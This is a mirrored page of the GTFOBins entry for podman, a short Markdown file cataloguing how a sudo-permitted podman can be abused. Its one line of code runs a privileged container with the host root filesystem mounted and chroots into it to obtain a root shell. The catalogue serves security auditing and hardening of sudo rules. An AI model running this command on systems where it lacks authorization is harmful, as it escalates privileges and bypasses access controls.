1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-23 04:20:44 +02:00
GTFOBins.github.io/_gtfobins/podman.md
2023-09-25 04:15:34 +02:00

7 lines
165 B
Markdown

---
functions:
sudo:
- description: The resulting is a root shell.
code: sudo podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt sh
---